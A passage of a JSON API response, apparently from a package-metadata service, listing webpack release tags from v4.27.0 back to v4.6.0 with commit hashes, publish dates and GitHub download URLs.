te.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"h